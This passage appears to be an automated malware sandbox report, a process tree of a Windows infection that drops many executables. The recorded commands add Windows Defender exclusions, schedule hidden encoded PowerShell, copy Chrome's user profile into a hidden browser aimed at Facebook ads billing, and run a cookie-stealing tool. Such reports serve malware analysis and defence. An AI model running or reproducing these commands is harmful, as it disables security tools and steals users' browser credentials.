- Adds Run key to start application
- Drops file in Program Files directory
PID:6984 -
C:\Program Files\Windows Multimedia Platform\RWQHPJPTHG\irecord.exe"C:\Program Files\Windows Multimedia Platform\RWQHPJPTHG\irecord.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\is-GH6RC.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-GH6RC.tmp\irecord.tmp" /SL5="$2034C,6265333,408064,C:\Program Files\Windows Multimedia Platform\RWQHPJPTHG\irecord.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
PID:3860
-
-
-
C:\Users\Admin\AppData\Local\Temp\43-3007e-227-034a5-e239173012d44\Haeshevyqaly.exe"C:\Users\Admin\AppData\Local\Temp\43-3007e-227-034a5-e239173012d44\Haeshevyqaly.exe"14⤵PID:5920
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0lckjrq.4wa\gaooo.exe & exit15⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\c0lckjrq.4wa\gaooo.exeC:\Users\Admin\AppData\Local\Temp\c0lckjrq.4wa\gaooo.exe16⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:688 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:4236
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:6132
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wku1nmao.4jf\md7_7dfj.exe & exit15⤵PID:5568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4b3xhzaz.ejn\askinstall31.exe & exit15⤵PID:4364
-
C:\Users\Admin\AppData\Local\Temp\4b3xhzaz.ejn\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\4b3xhzaz.ejn\askinstall31.exe16⤵PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\klmabvln.z4k\customer6.exe & exit15⤵PID:1428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:1748
-
-
C:\Users\Admin\AppData\Local\Temp\klmabvln.z4k\customer6.exeC:\Users\Admin\AppData\Local\Temp\klmabvln.z4k\customer6.exe16⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"17⤵
- Loads dropped DLL
PID:6680
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5rolbxab.dvy\HookSetp.exe & exit15⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\5rolbxab.dvy\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\5rolbxab.dvy\HookSetp.exe16⤵PID:1856
-
C:\ProgramData\8209482.exe"C:\ProgramData\8209482.exe"17⤵PID:7984
-
-
C:\ProgramData\5580281.exe"C:\ProgramData\5580281.exe"17⤵
- Suspicious behavior: SetClipboardViewer
PID:8172
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2raagmz.agi\19.exe & exit15⤵PID:4308
-
C:\Users\Admin\AppData\Local\Temp\i2raagmz.agi\19.exeC:\Users\Admin\AppData\Local\Temp\i2raagmz.agi\19.exe16⤵PID:4540
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"17⤵PID:3920
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install18⤵
- Loads dropped DLL
PID:5288
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jm3tmqud.t3u\setup_10.2_mix.exe & exit15⤵PID:5008
-
C:\Users\Admin\AppData\Local\Temp\jm3tmqud.t3u\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jm3tmqud.t3u\setup_10.2_mix.exe16⤵PID:748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vaa5rvbq.yyg\GcleanerWW.exe /mixone & exit15⤵PID:5696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ljo4ass.2sl\b9706c20.exe & exit15⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\3ljo4ass.2sl\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\3ljo4ass.2sl\b9706c20.exe16⤵PID:7636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lmdptog3.opw\setup.exe /8-2222 & exit15⤵PID:8324
-
C:\Users\Admin\AppData\Local\Temp\lmdptog3.opw\setup.exeC:\Users\Admin\AppData\Local\Temp\lmdptog3.opw\setup.exe /8-222216⤵PID:8724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Broken-Brook'17⤵PID:8756
-
-
C:\Program Files (x86)\Broken-Brook\7za.exe"C:\Program Files (x86)\Broken-Brook\7za.exe" e -p154.61.71.51 winamp.7z17⤵PID:2148
-
-
C:\Program Files (x86)\Broken-Brook\setup.exe"C:\Program Files (x86)\Broken-Brook\setup.exe" /8-222217⤵PID:5448
-
C:\Program Files (x86)\Broken-Brook\setup.exe"C:\Program Files (x86)\Broken-Brook\setup.exe" /8-222218⤵PID:2504
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uh2l042k.r34\setup.exe /S /kr /site_id=754 & exit15⤵PID:8612
-
C:\Users\Admin\AppData\Local\Temp\uh2l042k.r34\setup.exeC:\Users\Admin\AppData\Local\Temp\uh2l042k.r34\setup.exe /S /kr /site_id=75416⤵PID:9024
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"17⤵PID:1076
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&18⤵PID:8592
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3219⤵PID:3016
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6419⤵PID:8768
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTGbmlVXA" /SC once /ST 06:44:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="17⤵
- Creates scheduled task(s)
PID:6284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTGbmlVXA"17⤵PID:2972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTGbmlVXA"17⤵PID:7680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 14:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\ecCsQmm.exe\" 9n /site_id 754 /S" /V1 /F17⤵
- Creates scheduled task(s)
PID:8808
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nh034tdj.1rt\Four.exe & exit15⤵PID:8796
-
C:\Users\Admin\AppData\Local\Temp\nh034tdj.1rt\Four.exeC:\Users\Admin\AppData\Local\Temp\nh034tdj.1rt\Four.exe16⤵PID:9160
-
C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe" 1 3.1616940690.60608e92bd877 10418⤵PID:8928
-
C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L9U6IAAYT2\multitimer.exe" 2 3.1616940690.60608e92bd87719⤵PID:9008
-
C:\Users\Admin\AppData\Local\Temp\wuvthiaciic\vict.exe"C:\Users\Admin\AppData\Local\Temp\wuvthiaciic\vict.exe" /VERYSILENT /id=53520⤵PID:7572
-
C:\Users\Admin\AppData\Local\Temp\is-65HTU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-65HTU.tmp\vict.tmp" /SL5="$20610,870426,780800,C:\Users\Admin\AppData\Local\Temp\wuvthiaciic\vict.exe" /VERYSILENT /id=53521⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\is-8CTR6.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-8CTR6.tmp\winhost.exe" 53522⤵PID:6780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 44423⤵
- Program crash
PID:5816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dzaodven2f0\e1t2vabb1cz.exe"C:\Users\Admin\AppData\Local\Temp\dzaodven2f0\e1t2vabb1cz.exe" /ustwo INSTALL20⤵PID:8232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 65221⤵
- Program crash
PID:8504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 65621⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Program crash
- Checks SCSI registry key(s)
PID:3052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 69621⤵
- Program crash
PID:8464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 68021⤵
- Program crash
PID:5748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 88821⤵
- Program crash
PID:8956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 85221⤵
- Program crash
PID:2916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 115621⤵
- Program crash
PID:9064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8232 -s 116821⤵
- Program crash
PID:8364
-
-
-
C:\Users\Admin\AppData\Local\Temp\0ayrgxdutzm\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\0ayrgxdutzm\AwesomePoolU1.exe"20⤵PID:8036
-
-
C:\Users\Admin\AppData\Local\Temp\joivyqm5gza\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\joivyqm5gza\Setup3310.exe" /Verysilent /subid=57720⤵PID:8424
-
C:\Users\Admin\AppData\Local\Temp\is-C6O02.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-C6O02.tmp\Setup3310.tmp" /SL5="$306DC,138429,56832,C:\Users\Admin\AppData\Local\Temp\joivyqm5gza\Setup3310.exe" /Verysilent /subid=57721⤵PID:8884
-
C:\Users\Admin\AppData\Local\Temp\is-I231P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-I231P.tmp\Setup.exe" /Verysilent22⤵PID:8412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\01akwyzcfun\pesxlxgrdlq.exe"C:\Users\Admin\AppData\Local\Temp\01akwyzcfun\pesxlxgrdlq.exe" /1-61020⤵PID:4908
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Summer-Wind'21⤵PID:7084
-
-
C:\Program Files (x86)\Summer-Wind\7za.exe"C:\Program Files (x86)\Summer-Wind\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:1316
-
-
C:\Program Files (x86)\Summer-Wind\pesxlxgrdlq.exe"C:\Program Files (x86)\Summer-Wind\pesxlxgrdlq.exe" /1-61021⤵PID:6196
-
C:\Program Files (x86)\Summer-Wind\pesxlxgrdlq.exe"C:\Program Files (x86)\Summer-Wind\pesxlxgrdlq.exe" /1-61022⤵PID:6240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\k3wnb4r4lmd\app.exe"C:\Users\Admin\AppData\Local\Temp\k3wnb4r4lmd\app.exe" /8-2320⤵PID:5528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Restless-Forest'21⤵PID:9036
-
-
C:\Program Files (x86)\Restless-Forest\7za.exe"C:\Program Files (x86)\Restless-Forest\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:592
-
-
C:\Program Files (x86)\Restless-Forest\app.exe"C:\Program Files (x86)\Restless-Forest\app.exe" /8-2321⤵PID:5524
-
C:\Program Files (x86)\Restless-Forest\app.exe"C:\Program Files (x86)\Restless-Forest\app.exe" /8-2322⤵PID:9568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e4zv1ni0xv1\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\e4zv1ni0xv1\setup_10.2_us3.exe" /silent20⤵PID:10200
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "21⤵PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\xwoemtw4m14\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xwoemtw4m14\Setup3310.exe" /Verysilent /subid=57720⤵PID:7272
-
C:\Users\Admin\AppData\Local\Temp\is-90T3U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-90T3U.tmp\Setup3310.tmp" /SL5="$30732,138429,56832,C:\Users\Admin\AppData\Local\Temp\xwoemtw4m14\Setup3310.exe" /Verysilent /subid=57721⤵PID:5432
-
C:\Users\Admin\AppData\Local\Temp\is-D1OTB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-D1OTB.tmp\Setup.exe" /Verysilent22⤵PID:9928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\n1mbnyzpzcb\5uowlkp3euv.exe"C:\Users\Admin\AppData\Local\Temp\n1mbnyzpzcb\5uowlkp3euv.exe" /ustwo INSTALL20⤵PID:10704
-
-
C:\Users\Admin\AppData\Local\Temp\so1fygrcpiv\vict.exe"C:\Users\Admin\AppData\Local\Temp\so1fygrcpiv\vict.exe" /VERYSILENT /id=53520⤵PID:10532
-
C:\Users\Admin\AppData\Local\Temp\is-300S5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-300S5.tmp\vict.tmp" /SL5="$F06AC,870426,780800,C:\Users\Admin\AppData\Local\Temp\so1fygrcpiv\vict.exe" /VERYSILENT /id=53521⤵PID:8512
-
C:\Users\Admin\AppData\Local\Temp\is-DRSOK.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-DRSOK.tmp\winhost.exe" 53522⤵PID:4440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bzbpi2oyaik\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\bzbpi2oyaik\AwesomePoolU1.exe"20⤵PID:5564
-
-
C:\Users\Admin\AppData\Local\Temp\vxa5x0yf4i2\btfm5hlzaq3.exe"C:\Users\Admin\AppData\Local\Temp\vxa5x0yf4i2\btfm5hlzaq3.exe" /1-61020⤵PID:10084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Icy-Haze'21⤵PID:6840
-
-
C:\Program Files (x86)\Icy-Haze\7za.exe"C:\Program Files (x86)\Icy-Haze\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:10344
-
-
C:\Program Files (x86)\Icy-Haze\btfm5hlzaq3.exe"C:\Program Files (x86)\Icy-Haze\btfm5hlzaq3.exe" /1-61021⤵PID:10596
-
C:\Program Files (x86)\Icy-Haze\btfm5hlzaq3.exe"C:\Program Files (x86)\Icy-Haze\btfm5hlzaq3.exe" /1-61022⤵PID:7516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zyfdv2jsv1c\app.exe"C:\Users\Admin\AppData\Local\Temp\zyfdv2jsv1c\app.exe" /8-2320⤵PID:6508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Proud-Dust'21⤵PID:6884
-
-
C:\Program Files (x86)\Proud-Dust\7za.exe"C:\Program Files (x86)\Proud-Dust\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:10044
-
-
C:\Program Files (x86)\Proud-Dust\app.exe"C:\Program Files (x86)\Proud-Dust\app.exe" /8-2321⤵PID:8612
-
C:\Program Files (x86)\Proud-Dust\app.exe"C:\Program Files (x86)\Proud-Dust\app.exe" /8-2322⤵PID:4848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bo23rmc3tdn\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\bo23rmc3tdn\setup_10.2_us3.exe" /silent20⤵PID:7916
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B2U773T8N3\setups.exe"C:\Users\Admin\AppData\Local\Temp\B2U773T8N3\setups.exe" ll17⤵PID:8344
-
C:\Users\Admin\AppData\Local\Temp\is-IKEIM.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-IKEIM.tmp\setups.tmp" /SL5="$406DE,408070,216064,C:\Users\Admin\AppData\Local\Temp\B2U773T8N3\setups.exe" ll18⤵PID:8692
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\20-e1ac3-b02-8f990-33e373dd9b918\SHyxopikyro.exe"C:\Users\Admin\AppData\Local\Temp\20-e1ac3-b02-8f990-33e373dd9b918\SHyxopikyro.exe"14⤵
- Executes dropped EXE
- Checks computer location settings
PID:5808
-
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\is-VB38T.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-VB38T.tmp\LabPicV3.tmp" /SL5="$40438,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5184 -
C:\Users\Admin\AppData\Local\Temp\is-S7IGB.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-S7IGB.tmp\ppppppfy.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:6972 -
C:\Program Files\Windows Defender\XKPMBUWNTB\prolab.exe"C:\Program Files\Windows Defender\XKPMBUWNTB\prolab.exe" /VERYSILENT14⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\is-RRTMH.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-RRTMH.tmp\prolab.tmp" /SL5="$4044E,575243,216576,C:\Program Files\Windows Defender\XKPMBUWNTB\prolab.exe" /VERYSILENT15⤵
- Drops file in Program Files directory
PID:2976
-
-
-
C:\Users\Admin\AppData\Local\Temp\3f-52f1c-26b-ce284-1315a50142dd1\Fozhishenyvi.exe"C:\Users\Admin\AppData\Local\Temp\3f-52f1c-26b-ce284-1315a50142dd1\Fozhishenyvi.exe"14⤵PID:4376
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yyof5f5k.wq4\gaooo.exe & exit15⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\yyof5f5k.wq4\gaooo.exeC:\Users\Admin\AppData\Local\Temp\yyof5f5k.wq4\gaooo.exe16⤵PID:6440
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:8200
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:9704
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzg22b2h.uhh\md7_7dfj.exe & exit15⤵
- Suspicious use of SetWindowsHookEx
PID:6112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejsrzhvd.54e\askinstall31.exe & exit15⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\ejsrzhvd.54e\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ejsrzhvd.54e\askinstall31.exe16⤵PID:2844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:1156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:7180
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵
- Enumerates system info in registry
PID:7996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵PID:5752
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xdc,0xe0,0xe4,0xb8,0x60,0x7ffe08786e00,0x7ffe08786e10,0x7ffe08786e2018⤵PID:6148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1920 /prefetch:818⤵PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1900 /prefetch:818⤵PID:6524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:218⤵PID:7648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:118⤵PID:7804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:118⤵PID:7544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:118⤵PID:7092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:118⤵PID:5136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:118⤵PID:5132
-
-
